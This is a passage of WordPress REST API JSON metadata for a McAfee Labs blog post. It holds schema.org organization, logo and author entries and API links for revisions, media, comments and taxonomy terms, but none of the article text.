News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/190356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=190356"}],"version-history":[{"count":6,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/190356\/revisions"}],"predecessor-version":[{"id":190962,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/190356\/revisions\/190962"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/190932"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=190356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=190356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=190356"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=190356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}